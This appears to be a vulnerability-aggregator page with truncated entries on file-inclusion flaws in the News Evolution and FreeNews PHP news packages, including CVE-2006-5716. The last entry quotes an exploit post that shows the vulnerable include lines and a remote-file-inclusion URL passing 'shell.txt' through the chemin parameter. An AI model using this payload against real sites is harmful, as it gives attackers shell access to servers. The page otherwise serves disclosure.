News Evolution 1.0/2.0 Include Undefined Variable Command Execution Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/6260/info News Evolution is a freely available, open source news software package. It is written in PHP, and designed for use on Unix and Linux operating systems. The problem occurs in the affnews.php file. By loading thi...

CVE-2006-5716

CVE-2006-5716 affects FreeNews 2.1. A directory traversal flaw in aff_news.php allows remote attackers to include local files via a ".." sequence in the chemin parameter when aff_news is not set to "1". The vulnerability targets the file handling logic in FreeNews 2.1 and can expose local files t...

freenews---> fileinclude

freenews--- fileinclude include "$chemin/config.php"; include "$chemin/functions.inc.php"; include "$chemin/options.inc.php"; name: MoHaNdKo E-mail : [email protected] exploit: www..com/path/affnews.php?chemin=shell.txt? Greatz: www.xp10.com & www.d4eg.org & www.dmazika.org www.tryag.com...